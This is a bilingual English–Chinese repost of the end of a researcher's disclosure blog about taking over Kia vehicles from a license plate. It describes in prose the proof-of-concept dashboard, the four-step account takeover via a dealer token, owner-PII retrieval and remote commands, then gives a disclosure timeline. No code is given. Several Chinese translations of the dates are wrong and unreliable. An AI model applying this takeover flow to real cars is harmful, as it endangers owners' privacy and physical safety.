The impact here was really obvious to us and we reported it to Kia immediately, but while they were working on a fix we decided to build a proof of concept dashboard that better demonstrated the impact of this vulnerability.
这里的影响对我们来说非常明显,我们立即向起亚报告了这一情况,但当他们致力于修复时,我们决定构建一个概念验证仪表板,以更好地展示此漏洞的影响。

Creating License Plate Takeover Proof of Concept
创建车牌接管概念证明

The goal of our proof of concept UI was to simply have a dashboard where an attacker could (1) type in the license plate of a Kia vehicle, (2) retrieve the owner’s PII, then (3) execute commands on the vehicle.
我们概念验证 UI 的目标只是拥有一个仪表板,攻击者可以在其中 (1) 输入起亚汽车的车牌,(2) 检索车主的 PII,然后 (3) 在车辆上执行命令。

Because we were adding the victims’ vehicle to our attacker controlled account, we decided to build the proof of concept to have an “exploit” and “garage” page. The exploit page would be used to actually take over the vehicles, then the garage page would be used to issue commands and locate the vehicles.
因为我们将受害者的车辆添加到攻击者控制的帐户中,所以我们决定构建概念验证以拥有“利用”和“车库”页面。漏洞利用页面将用于实际接管车辆,然后车库页面将用于发出命令并定位车辆。

It worked via the following:
它通过以下方式发挥作用:

  • The License Plate to VIN form uses a third-party API to convert license plate number to VIN
    License Plate to VIN表单使用第三方 API 将车牌号转换为 VIN
  • The Takeover button would do the 4-step process to takeover a victim’s vehicle using the retrieved VIN from the license plate number, by (1) generating a dealer token via the login form, (2) retrieving the email/phone number from the victim’s account, (3) demoting the account owner to an account holder, (4) adding ourselves as the primary account holder.
    Takeover按钮将执行 4 个步骤,使用从车牌号检索到的 VIN 来接管受害者的车辆,方法是 (1) 通过登录表单生成经销商令牌,(2) 从受害者的电子邮件/电话号码中检索电子邮件/电话号码帐户,(3) 将帐户所有者降级为帐户持有人,(4) 将我们自己添加为主要帐户持有人。
  • The Fetch Owner button would passively tell us the name, email, and phone number of the victim
    Fetch Owner按钮会被动地告诉我们受害者的姓名、电子邮件和电话号码
  • The Garage tab would allow us to list and execute commands on compromised vehicles
    Garage选项卡允许我们列出并在受感染的车辆上执行命令

After building this tool, we recorded a proof of concept using a locked rental Kia. This video included at the start of the blog shows us taking over a vehicle using our phone, then being able to remotely lock/unlock, start/stop, honk, and locate the vehicle.
构建此工具后,我们使用锁定的租赁起亚记录了概念验证。博客开头的这段视频展示了我们使用手机接管车辆,然后能够远程锁定/解锁、启动/停止、鸣喇叭和定位车辆。

Hacking Kia: Remotely Controlling Cars With Just a License Plate
Hacking a car using just the license plate
仅使用车牌即可破解汽车

 

Hacking Kia: Remotely Controlling Cars With Just a License Plate
Executing commands on the compromised vehicle
在受感染的车辆上执行命令

 

Conclusion 结论

Cars will continue to have vulnerabilities, because in the same way that Meta could introduce a code change which would allow someone to takeover your Facebook account, car manufacturers could do the same for your vehicle.
汽车将继续存在漏洞,因为就像 Meta 可能引入代码更改以允许某人接管您的 Facebook 帐户一样,汽车制造商也可以对您的车辆做同样的事情。

Thanks for reading! 感谢您的阅读!

(shouts: teknogeek, dnz, ziot, xEHLE, umasi, shubs, computeruser, ic3qu33n)
(大喊:teknogeek、dnz、ziot、xEHLE、umasi、shubs、computeruser、ic3qu33n)

Timeline 时间轴

  • 06/07/24 04:40 PM UTC – Inquiry sent to Kia team on correct place to report vulnerabilities
    UTC 时间 24 年 7 月 6 日下午 04:40 – 向 Kia 团队发送了有关报告漏洞的正确位置的询问
  • 06/10/24 01:21 PM UTC – Response by Kia Team
    UTC 时间 24 年 6 月 10 日 01:21 – 起亚团队的回应
  • 06/11/24 10:41 PM UTC – Report sent to Kia
    UTC 时间 24 年 11 月 6 日晚上 10:41 – 报告已发送至 Kia
  • 06/12/24 06:20 PM UTC – Email to bump ticket due to criticality
    UTC 时间 24 年 6 月 12 日下午 06:20 – 由于严重性,通过电子邮件发送紧急通知单
  • 06/14/24 06:00 PM UTC – Response from Kia team that they were investigating
    UTC 时间 24 年 6 月 14 日下午 06:00 – 起亚团队回应称他们正在调查
  • 06/18/24 04:41 PM UTC – Email to bump ticket due to criticality, added screenshots of tool
    06/18/24 04:41 PM UTC – 由于严重性而通过电子邮件发送至碰撞票证,添加了工具的屏幕截图
  • 06/20/24 02:54 AM UTC – Email to bump ticket, included screenshot of license plate to access tool
    24 年 6 月 20 日凌晨 02:54 UTC – 通过电子邮件发送碰撞票,包括用于访问工具的车牌屏幕截图
  • 08/12/24 12:30 PM UTC – Email to bump ticket, asking for update
    UTC 时间 24 年 8 月 12 日下午 12:30 – 发送电子邮件至碰撞票,要求更新
  • 08/14/24 05:41 PM UTC – Response from Kia team indicating they had remediated the vulnerability and were performing testing
    UTC 时间 24 月 14 日 05:41 – Kia 团队的回复表示他们已修复该漏洞并正在执行测试
  • 09/26/24 08:15 AM UTC – Disclosed vulnerability publicly after validating it had been remediated
    24 年 9 月 26 日上午 08:15 UTC – 在验证已修复漏洞后公开披露该漏洞

原文始发于samcurry:Hacking Kia: Remotely Controlling Cars With Just a License Plate

版权声明:admin 发表于 2024年9月27日 下午8:45。
转载请注明:Hacking Kia: Remotely Controlling Cars With Just a License Plate | CTF导航

相关文章

汽车后量子密码学
admin
197
Aurora的自动驾驶技术介绍
admin
796
攻击特斯拉-从无线到 CAN 总线
admin
623
特斯拉Model S Plaid的12V配电系统
admin
928
车载网络的安全
admin
733
FlexRay总线原理及应用
admin
1,068

相关文章

TESLA TPMS-RCE(0-click)
0
汽车强规之网络安全持续监控细则-木卫四实践
0
车联网安全入门——CAN总线模糊测试
0
汽车电子_功能英文名称缩写汇总
0
自动驾驶汽车线控技术深度解析
0
【车联网】撸穿车充站顺带喜提一堆CVE
0
如何模糊测试SOME/IP协议 (二)如何进入宝马名人堂
0
CAN协议分析
0
如何模糊测试SOME/IP协议 (一)
0
《面向车路云一体化的智能网联汽车数据分类分级指南》
0